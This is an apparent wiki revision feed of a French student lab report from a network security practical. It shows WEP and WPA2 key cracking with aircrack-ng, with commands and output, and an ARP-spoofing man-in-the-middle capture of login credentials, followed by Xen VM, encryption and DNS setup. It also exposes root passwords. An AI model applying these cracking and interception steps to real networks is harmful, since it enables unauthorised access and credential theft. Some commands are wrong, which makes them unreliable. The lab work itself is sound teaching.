=== Utilisation de AirCrack pour clef WEP ===&lt;br /&gt;
 &lt;br /&gt;
Après avoir branché la clef WiFi, on se sert de &amp;lt;code&amp;gt;airmon-ng&amp;lt;/code&amp;gt; qui est un utilitaire qui espionne le réseau et permet d'obtenir les types d'interfaces communicantes/espionnable.&lt;br /&gt;
 airmon-ng&lt;br /&gt;
Pour tenter de s'y connecter en tant qu'espion, il faut alors taper (nous le tapons ici avec wlan0mon):&lt;br /&gt;
 airmon-ng start wlx40a5ef059784&lt;br /&gt;
Puis, pour observer et découvrir les canaux associés au réseau et leurs SSID,il faut taper:&lt;br /&gt;
 airodump-ng wlan0mon &lt;br /&gt;
&lt;br /&gt;
On obtien le résultat ci dessous :                                   &lt;br /&gt;
                                                                                                                &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                                 &lt;br /&gt;
 38:0E:4D:B0:E9:E0   -1        0        1    0   1  -1   WPA              &amp;lt;length:  0&amp;gt;                          &lt;br /&gt;
 04:DA:D2:9C:50:51  -30       49      834    0   9  54e. WEP  WEP         cracotte02                            &lt;br /&gt;
 04:DA:D2:9C:50:5A  -29       44      841    0   9  54e. WEP  WEP         cracotte11                            &lt;br /&gt;
 04:DA:D2:9C:50:56  -28       53      832    9   9  54e. WEP  WEP         cracotte07                            &lt;br /&gt;
 04:DA:D2:9C:50:57  -29       54      803    0   9  54e. WEP  WEP         cracotte08                            &lt;br /&gt;
 04:DA:D2:9C:50:59  -30       50      833    0   9  54e. WEP  WEP         cracotte10                            &lt;br /&gt;
 04:DA:D2:9C:50:54  -29       48      841    0   9  54e. WEP  WEP         cracotte05                            &lt;br /&gt;
 04:DA:D2:9C:50:50  -29       50      841    0   9  54e. WEP  WEP         cracotte01                            &lt;br /&gt;
 04:DA:D2:9C:50:5B  -29       50      825    0   9  54e. WEP  WEP         cracotte12                            &lt;br /&gt;
 04:DA:D2:9C:50:53  -33       46      843    0   9  54e. WEP  WEP         cracotte04                            &lt;br /&gt;
 04:DA:D2:9C:50:58  -28       50      694    0   9  54e. WEP  WEP         cracotte09                            &lt;br /&gt;
 04:DA:D2:9C:50:55  -30       49      746    0   9  54e. WEP  WEP         cracotte06                            &lt;br /&gt;
 04:DA:D2:9C:50:52  -33       50      764    0   9  54e. WEP  WEP         cracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:28  -30       60        0    0   4  54e. WPA2 CCMP   PSK  kracotte09                            &lt;br /&gt;
 00:14:1B:60:8C:22  -31       55        0    0   4  54e. WPA2 CCMP   PSK  kracotte03                            &lt;br /&gt;
 00:14:1B:60:8C:27  -32       64        0    0   4  54e. WPA2 CCMP   PSK  kracotte08                            &lt;br /&gt;
 00:14:1B:60:8C:24  -34       58        0    0   4  54e. WPA2 CCMP   PSK  kracotte05                            &lt;br /&gt;
 00:14:1B:60:8C:23  -31       63        0    0   4  54e. WPA2 CCMP   PSK  kracotte04&lt;br /&gt;
&lt;br /&gt;
Le réseau que nous voulons craquer est &amp;lt;code&amp;gt;cracotte05 ssid : 04:DA:D2:9C:50:54  chanel : 9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On utilise la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_cracotte05 -c 9 --bssid 04:DA:D2:9C:50:54 wlan0mon&amp;lt;/code&amp;gt;. cela nous crée un &amp;lt;code&amp;gt;reseau_cracotte05-01.cap&amp;lt;/code&amp;gt; On n'as pluq qu'a faire un &amp;lt;code&amp;gt;aircrack-ng reseau_cracotte05-01.cap &amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
 KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   F1(50176) 48(46848) A1(46080) C9(45824) 2A(45056) &lt;br /&gt;
    1    0/  1   DE(50944) F0(46592) 60(45824) 4D(45312) 1E(44544) &lt;br /&gt;
    2    1/  3   D4(47360) 98(46336) B6(45568) A7(45056) EB(45056) &lt;br /&gt;
    3    0/  2   00(47360) 34(46848) 4E(45824) 6F(44800) 35(44544) &lt;br /&gt;
    4    0/  1   00(50688) 09(45824) 50(45568) FD(45056) 5E(44032) &lt;br /&gt;
    5    0/  3   00(46592) BD(45824) 4A(45824) 5A(45056) 87(45056) &lt;br /&gt;
    6    0/  1   00(51456) 09(47104) 3A(45824) F9(45824) 04(45568) &lt;br /&gt;
    7    0/  1   00(51712) C9(47360) 08(46336) 56(45312) E2(44800) &lt;br /&gt;
    8    0/  1   00(54016) 05(45568) C1(45312) D5(44544) B7(44288) &lt;br /&gt;
    9    0/  2   00(47872) 56(46592) 84(45568) 88(45568) F2(45056) &lt;br /&gt;
   10    1/  2   09(48128) 6B(45824) D5(45824) 0C(45568) C2(45568) &lt;br /&gt;
   11    0/  2   99(48128) 76(47616) 99(46080) E6(46080) 06(44800) &lt;br /&gt;
   12    2/  4   FD(44800) DE(44544) B9(44032) 3F(43776) 94(43776) &lt;br /&gt;
&lt;br /&gt;
   KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:00:09:99:99 ] &lt;br /&gt;
   Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
Et voila nous avons trouver clef du réseau wifi cracotte05&lt;br /&gt;
&lt;br /&gt;
=== Utilisation de AirCrack pour clef WPA2-PSA ===&lt;br /&gt;
&lt;br /&gt;
On va maintenant craquer le réseau Kracotte05 qui est un réseau WPA on sait d'avance que la clef WPA est un nombre sur 8 chiffres.&lt;br /&gt;
On va donc faire un &amp;quot;cassage par force brute&amp;quot; avec un fichier texte contenant tout les combination de 00000000 a 99999999.&lt;br /&gt;
&lt;br /&gt;
On commence par installer Crnch avec la commande &amp;lt;code&amp;gt;sudo apt-get install -y crunch&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois installer on génère un fichier dictionnaite.txt avec la commande &amp;lt;code&amp;gt;crunch 8 8 0123456789 &amp;gt;&amp;gt; dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
On relance la commande &amp;lt;code&amp;gt;airodump-ng -w reseau_kracotte05 -c 5 --bssid 00:14:1B:60:8C:24&amp;lt;/code&amp;gt;&lt;br /&gt;
On a bien sure remplacer le ssid et le chanel par celui du wifi Kracotte05.&lt;br /&gt;
&lt;br /&gt;
Puis nous lançons aircrack-ng avec la commande &amp;lt;code&amp;gt;aircrack-ng reseau_kracotte05-01.cap -w dictionnaire_wpa.txt&amp;lt;/code&amp;gt;&lt;br /&gt;
Read 121032 packets.&lt;br /&gt;
&lt;br /&gt;
   #  BSSID              ESSID                     Encryption&lt;br /&gt;
 &lt;br /&gt;
   1  00:14:1B:60:8C:24  kracotte05                No data - WEP or WPA&lt;br /&gt;
 &lt;br /&gt;
   Choosing first network as target.&lt;br /&gt;
 &lt;br /&gt;
   Opening reseau_kracotte05-01.cap&lt;br /&gt;
   Read 121032 packets.&lt;br /&gt;
 &lt;br /&gt;
   1 potential targets&lt;br /&gt;
   Got no data packets from target network!&lt;br /&gt;
   Quitting aircrack-ng...&lt;br /&gt;
&lt;br /&gt;
On peut voir que cela prend du temps pour récupérer les data nécessaire pour effectuer le crackage 1 data toutes les 15 minutes.&lt;br /&gt;
Une fois que on a récupérer les data, on peux effectuer le &amp;quot;cassage par force brute&amp;quot; &lt;br /&gt;
&lt;br /&gt;
  Aircrack-ng 1.5.2 &lt;br /&gt;
 &lt;br /&gt;
      [00:32:18] 10323450/102795810 keys tested (2771.75 k/s) &lt;br /&gt;
 &lt;br /&gt;
      Time left: 9 hours, 16 minutes, 11 seconds                10.04%&lt;br /&gt;
 &lt;br /&gt;
                           KEY FOUND! [ 10244444 ]&lt;br /&gt;
  &lt;br /&gt;
&lt;br /&gt;
      Master Key     : D6 B0 55 29 8C A0 B4 C9 13 24 C9 03 8C D5 13 4B &lt;br /&gt;
                       46 A4 C2 DB 79 E7 4C BC AE B5 5A 5D 48 D7 C4 3B &lt;br /&gt;
 &lt;br /&gt;
      Transient Key  : 25 23 28 1B 21 51 4B 87 07 51 A4 8E D1 80 48 C8 &lt;br /&gt;
                       54 F6 87 8B 30 DF C1 D0 E6 1A 74 87 2F 50 EC 1B &lt;br /&gt;
                       9B 24 39 29 40 E3 BD 89 CD AE 3E 81 E9 EC 16 70 &lt;br /&gt;
                       79 F9 24 2E 30 4E 52 24 A9 41 30 52 E1 25 EC 85 &lt;br /&gt;
 &lt;br /&gt;
      EAPOL HMAC     : 7F AC 76 7D B5 33 0C 24 20 C3 BA A2 4B DF 2F CD&lt;br /&gt;
&lt;br /&gt;
On a bien trouver la clé du wifi !&lt;br /&gt;
On voit que cela peut prendre beaucoup de temps pour trouver la clé, d'out l'interner de couper le dictionnaire en plusieurs et lancer le traitement sur plusieurs pc des camarades de classe. Cela permet de diviser le temps de traitement par le nombre de machine utilisé.&lt;br /&gt;
&lt;br /&gt;
===Exploitation de failles du système===&lt;br /&gt;
&lt;br /&gt;
===Attaque de type &amp;quot;homme au milieu&amp;quot; par usurpation ARP===&lt;br /&gt;
Maintenant on tesnt une attaque par &amp;quot;homme au milieu&amp;quot; pour commancé, on va installer le paquetage &amp;lt;code&amp;gt;dsniff&amp;lt;/code&amp;gt; pour cela on utilise la commande : &amp;lt;code&amp;gt;apt-get install dsniff&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On regarde dans un premier temps si le pc peut se comporter comme un routeur avec la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; normalement il nous notifie '0' se qui prouve que le pc ne se comporte pas comme un routeur. On utilise la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/ip_forward&amp;lt;/code&amp;gt; pour faire passer la variable a 1. maintenant le PC peut se comporter comme un routeur.&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;cat /proc/sys/net/ipv4/conf/all/rp_filter&amp;lt;/code&amp;gt; la variable recu doit être a '0' ce qui permet aux pc de renvoyer les requètes sur l'interface qui les a recu.&lt;br /&gt;
&lt;br /&gt;
Ensuite on fait un &amp;lt;code&amp;gt;ip r&amp;lt;/code&amp;gt; pour récupérer l'adresse ip du routeur.&lt;br /&gt;
[[Fichier:Ip_r_mirage.png|1000px|thumb|left|capture de la commande ip r]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On fait la commande &amp;lt;code&amp;gt;arpspoof -i bridge -t zabeth07 172.26.145.254&amp;lt;/code&amp;gt;&lt;br /&gt;
On lance Wireshark en root en utilisant la commande &amp;lt;code&amp;gt;su&amp;lt;/code&amp;gt; si celui ci n'est pas installer on fait préalablement &amp;lt;code&amp;gt;apt-get install wireshark&amp;lt;/code&amp;gt;&lt;br /&gt;
Une fois Wireshark lancé, on filtre tout les paquets en provenance de nottre cible la zabeth07.&lt;br /&gt;
Il faut fauire attention de bien désativer les proxi dans firefow sinon cela ne fonctionne pas.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Wireshark_mirage.png|1000px|thumb|left|capture de Wiresharkf]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On peut voir que on a bien recupérer les mdp lors de la connexion aux site 'applications.polytech-lille.net'.&lt;br /&gt;
 Non d'utilisateur : Oui le pas de calais&lt;br /&gt;
 Mdp : le mdp&lt;br /&gt;
&lt;br /&gt;
=== Intrusion sur un serveur d’application Web===&lt;br /&gt;
&lt;br /&gt;
==Réalisations==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de données===&lt;br /&gt;
&lt;br /&gt;
===Chiffrement de données===&lt;br /&gt;
&lt;br /&gt;
Parfois il est necessaire de chiffrer les données importante,d'avoir des clef USB, ou des fichier sécuriser. Pour sécuriser la clef USB, on va utilisé 'cryptsetup'&lt;br /&gt;
pour commancer on installe les paquetages 'lvm2' et 'cryptsetup'.&lt;br /&gt;
 apt-get install cryptsetup&lt;br /&gt;
 apt-get install lvm2 &lt;br /&gt;
&lt;br /&gt;
Le [https://doc.ubuntu-fr.org/cryptsetup site] on peut trouver la liste des commandes necessaire pour crypter le clef USB.&lt;br /&gt;
&lt;br /&gt;
Premièrement on va formaté la clef usb pour avoir un disque propre avec la commande &amp;lt;code&amp;gt;mkfs.vfat -n 'Alex.G' -I /dev/sdb1&amp;lt;/code&amp;gt; on obtien le nom de la clef USB avec la commande &amp;lt;code&amp;gt;df -h&amp;lt;/code&amp;gt;&lt;br /&gt;
On a maintenant une clef USB clean qui a comme nom Alex.G et un format FAT32.&lt;br /&gt;
&lt;br /&gt;
On peut lancer le cryptage de la clef USB avec la commande &amp;lt;code&amp;gt;cryptsetup luksFormat -c aes-xts-plain -s 512 /dev/sdb&amp;lt;/code&amp;gt; Pour savoir ou les la clef USB on utilise la commande &amp;lt;code&amp;gt;lsblk&amp;lt;/code&amp;gt;&lt;br /&gt;
On choisi un mdp pour le clef USB, puis on envoie le fichier etc sur le clef pour vérifier si il est bien encrypter. Une fois la clef crypter avec un fichier dessu, on va sur un autre pc et on, vérifie si le fichier est bien crypter.&lt;br /&gt;
La liste des commande utilisé est listé ci-dessous : &lt;br /&gt;
 mount /dev/mapper/Alex.G /mnt&lt;br /&gt;
 cp -r /etc /mnt&lt;br /&gt;
 umount /mnt&lt;br /&gt;
 cryptsetup luksClose Alex.G&lt;br /&gt;
&lt;br /&gt;
On peut voir que le clef USB crypter fonctionne bien.&lt;br /&gt;
[[Fichier:ClefUSBLock_2020-11-13_11-48-55.png|1000px|thumb|left|Cryptage de la clef USB]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Inspection ARP par un élément réseau===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation WiFi par WPA2-EAP===&lt;/div&gt;</summary>
		<author><name>Aglaine</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53932</id>
		<title>TP sysres IMA2a5 2020/2021 G5</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2020/2021_G5&amp;diff=53932"/>
				<updated>2020-11-20T08:20:30Z</updated>
		
		<summary type="html">&lt;p&gt;Aglaine : /* Installation d'une méchagerie */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Cet atelier consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système vous aurez à installer une machine virtuelle Xen et à y configurer des services. Enfin la mise en place d’un réseau WiFi sécurisé et d’un site web sécurisé vous permettent de mettre en pratiques vos connaissances en la matière.&lt;br /&gt;
&lt;br /&gt;
=== Tableau Récapitulatif ===&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Vlan7&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|193.48.57.168&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de de la VM &lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|mirage&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth06&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTP&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet version HTTPS&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== Installation des systèmes d’exploitation == &lt;br /&gt;
&lt;br /&gt;
Pour installer une Machine Virtuelle, il faut d'abord se connecter sur le disque de virtualisation.&lt;br /&gt;
Pour cela, il faut utiliser la commande : &lt;br /&gt;
 ssh capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
=== Installation dans la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Une fois connecter, il faut lancer la création de la Machine virtuelle avec la commande :&lt;br /&gt;
  xen-create-image --hostname=mirage --ip 193.48.57.168 --netmask=255.255.255.0 --gateway=100.64.0.5 --dist=ascii --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
L'installation prend un certain temps pour regarder si l'installation se déroule bien, on peut ouvrir un second terminale connecté en SSH a &amp;quot;capbreton&amp;quot; puis on utilise la commande : &lt;br /&gt;
 tail -f /var/log/xen-tools/mirage.0.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation, on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
     ---------------------&lt;br /&gt;
     Hostname        :  mirage&lt;br /&gt;
     Distribution    :  ascii&lt;br /&gt;
     MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
     IP Address(es)  :  dynamic&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
     SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
     Root Password   :  DgtUlOmnBFERdfarGBsopGR&lt;br /&gt;
&lt;br /&gt;
Une fois la VM créer, nous pouvons la lancer avec la commande :&lt;br /&gt;
 xl create /etc/xen/mirage.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que le VM est bien démarrer avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
Pour fonctionner l'état de la VM doit être r ou -b&lt;br /&gt;
[[Fichier:LancementVm.PNG|1000px|thumb|left|Liste des VM en fonctionnement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On accède pour la premier fois a nottre Vm avec la commande :&lt;br /&gt;
 xl console mirage&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). &lt;br /&gt;
Après nous être logué, on change le mot de passe qui devient : glopglopglop.&lt;br /&gt;
&lt;br /&gt;
=== Configuration de la machine virtuelle Xen ===&lt;br /&gt;
&lt;br /&gt;
Il faut maintenant installer les packages que nous avons besoins : &lt;br /&gt;
 apt-get update&lt;br /&gt;
 apt-get install VIM&lt;br /&gt;
&lt;br /&gt;
Il faut configurer l'adresse IP et le mask de la VM. Pour cela on utilise la commande :&lt;br /&gt;
 vim /etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Dans interfaces on tajoute &lt;br /&gt;
 auto eth0&lt;br /&gt;
 iface eth0 inet static&lt;br /&gt;
 address 193.48.57.168&lt;br /&gt;
 gateway 193.58.57.163&lt;br /&gt;
 netmask 255.255.255.248&lt;br /&gt;
&lt;br /&gt;
Pour que la machine soit joignable par SSH via l'extérieure il est nécessaire de configurer la passerelle et le ssh_config. Pour cela on utilise la commande :&lt;br /&gt;
 vi /etc/ssh/ssh_config&lt;br /&gt;
 &lt;br /&gt;
Le fichier ssh_config doit être configurer comme ci dessous :&lt;br /&gt;
 Host *&lt;br /&gt;
 SendEnv LANH LC_*&lt;br /&gt;
 HashKnownHOST yes&lt;br /&gt;
 GSSAPIAuthentification yes&lt;br /&gt;
&lt;br /&gt;
Sur Capbreton, une paserell doit être mis en place pour pouvoir connecté les VM aux monde extérieure.&lt;br /&gt;
Pour cela on configure ces interfacte avec la commande : &lt;br /&gt;
 vim/etc/network/interfaces&lt;br /&gt;
&lt;br /&gt;
Puis on configure la passerelle comem ci dessous : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
 # The loopback network interface&lt;br /&gt;
  auto lo&lt;br /&gt;
  iface lo inet loopback&lt;br /&gt;
 &lt;br /&gt;
  # Physical Network Interfaces&lt;br /&gt;
  #&lt;br /&gt;
 auto eth&lt;br /&gt;
  iface eth inet static&lt;br /&gt;
    address 192.168.0.29&lt;br /&gt;
    netmask 255.255.255.0&lt;br /&gt;
    gateway 192.168.0.1&lt;br /&gt;
 &lt;br /&gt;
 auto eth0&lt;br /&gt;
  iface eth0 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth1&lt;br /&gt;
  iface eth1 inet manual&lt;br /&gt;
   post-up ip link set $IFACE up&lt;br /&gt;
   post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth2&lt;br /&gt;
 iface eth2 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth4&lt;br /&gt;
 iface eth4 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth5&lt;br /&gt;
 iface eth5 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth6&lt;br /&gt;
 iface eth6 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto eth7&lt;br /&gt;
 iface eth7 inet manual&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Main trunk bridge&lt;br /&gt;
 #&lt;br /&gt;
 auto Trunk&lt;br /&gt;
 iface Trunk inet manual&lt;br /&gt;
  bridge_ports eth4 eth5&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 # Virtual Network Interfaces&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto vlan48&lt;br /&gt;
 iface vlan48 inet static&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  address 172.26.191.21&lt;br /&gt;
  netmask 255.255.252.0&lt;br /&gt;
  gateway 172.26.191.254&lt;br /&gt;
 iface vlan48 inet6 auto&lt;br /&gt;
 &lt;br /&gt;
 auto vlan500&lt;br /&gt;
 iface vlan500 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 &lt;br /&gt;
 auto vlan502&lt;br /&gt;
 iface vlan502 inet manual&lt;br /&gt;
  vlan-raw-device Trunk&lt;br /&gt;
  post-up ip link set $IFACE up&lt;br /&gt;
  post-down ip link set $IFACE down&lt;br /&gt;
 # Bridge for IMA5sc group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA5sc&lt;br /&gt;
 iface IMA5sc inet manual&lt;br /&gt;
  bridge_ports eth0 eth6&lt;br /&gt;
 # Bridge for IMA2a5&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth1 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto L3MRIT&lt;br /&gt;
 iface L3MRIT inet manual&lt;br /&gt;
  bridge_ports eth2&lt;br /&gt;
 # Bridge for GIS group&lt;br /&gt;
 #&lt;br /&gt;
 &lt;br /&gt;
 auto bridgeGIS&lt;br /&gt;
 iface bridgeGIS inet manual&lt;br /&gt;
  bridge_ports vlan502&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Architecture réseau ==&lt;br /&gt;
&lt;br /&gt;
===Sécurisation du réseau===&lt;br /&gt;
&lt;br /&gt;
==Services Internet==&lt;br /&gt;
&lt;br /&gt;
===Serveur SSH===&lt;br /&gt;
&lt;br /&gt;
On peux maintenant se connecté a la VM mirage avec la commande : &amp;lt;code&amp;gt;ssh root@193.48.57.168 -p 2222&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS===&lt;br /&gt;
Un serveur DNS (Domain Name System) permet d'effectuer correspondance entre un nom de domaine et une adresse IP. Grâce à DNS, il n'est pas nécessaire de se souvenir des adresses IP pour naviguer sur Ethernet. Pour installer notre propre serveur DNS nous avons utilisé Bind9.&lt;br /&gt;
&lt;br /&gt;
Nous commençons tout d'abord par installer bind9 via la commande suivante : &amp;lt;code&amp;gt;apt-get install bind9&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Création et configuration named.conf.local ====&lt;br /&gt;
Le &amp;lt;code&amp;gt;named.conf.local&amp;lt;/code&amp;gt; permet de faire pointer un nom de domaine pleinement qualifié (FQDN fully qualified domain name) sur une adresse IP. &lt;br /&gt;
&lt;br /&gt;
Il faut tout d'abbord modifié le fichier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; qui contient la configuration DNS et y déclaré les zones associées au domaine ainsi qu'un fichier de description de la zone.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-config-named.conf.local.png|1000px|thumb|left|Configuration de mirage]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Puis créé le fichier de configuration appelé &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt; avec la commande &amp;lt;code&amp;gt;vim /etc/bind/glopglop.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Configuration_bind9.png|1000px|thumb|left|Configuration de bind9]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On relance le service 'bind9' avec la commande :&amp;lt;code&amp;gt;service bind9 restart&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On vérifie que le DNS fonctionne bien avec le commande &amp;lt;code&amp;gt;host dns1.glopglop.site localhost&amp;lt;/code&amp;gt;&lt;br /&gt;
[[Fichier:Dns1.glopglop.site_2020-11-13_08-57-52.png|1000px|thumb|left|Vérification du DNS en local]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
Le DNS fonctionne donc bien.&lt;br /&gt;
&lt;br /&gt;
==== Configuration gandi.net ====&lt;br /&gt;
Grâce au registrar gandi.net, nous avons réservé le nom de domaine &amp;lt;code&amp;gt;glopglop.site&amp;lt;/code&amp;gt;. L'extension &amp;lt;code&amp;gt;.site&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Gandi-glopglop-VueGeneral.PNG|1000px|thumb|left|Image de la configuration de Gandi]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On va maintenant ajouter un &amp;quot;glue record&amp;quot; qui est un enregistrement collé. Il permet d'associer un nom d'hôte avec une adresse IP au registre.&lt;br /&gt;
Glue records fournis par gandi pour associer un hostname (nom de serveur ou DNS) à l'adresse IP de notre machine. Les modifications seront effectives entre 12 et 24 heures.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:Mirage-Ajoue-GlueRecord.PNG|1000px|thumb|left|Image de la configuration de Gandi avec Glue Record]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le &amp;quot;glue record&amp;quot; renseigner se qui va lié nottre dns a une ip, il faur renseigner les serveur de non. cela prend 27/72h.&lt;br /&gt;
Il faut bien faire attention que la VM soit correctement configurer avec 'bind9' car c'est lui qui donne IPv4 et IPv6 correspondant à vos noms de machines. Si ce n'est pas le cas gandi ne pourras pas liée les dns a l'ip de la machine.&lt;br /&gt;
&lt;br /&gt;
[[Fichier:GandiDNS_2020-11-13_09-00-16.png|1000px|thumb|left|DNS sur GANDI]]&lt;br /&gt;
&amp;lt;br style=&amp;quot;clear: both;&amp;quot; \&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois les serveuyrs de non configurer, on peux fermer GANDI.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
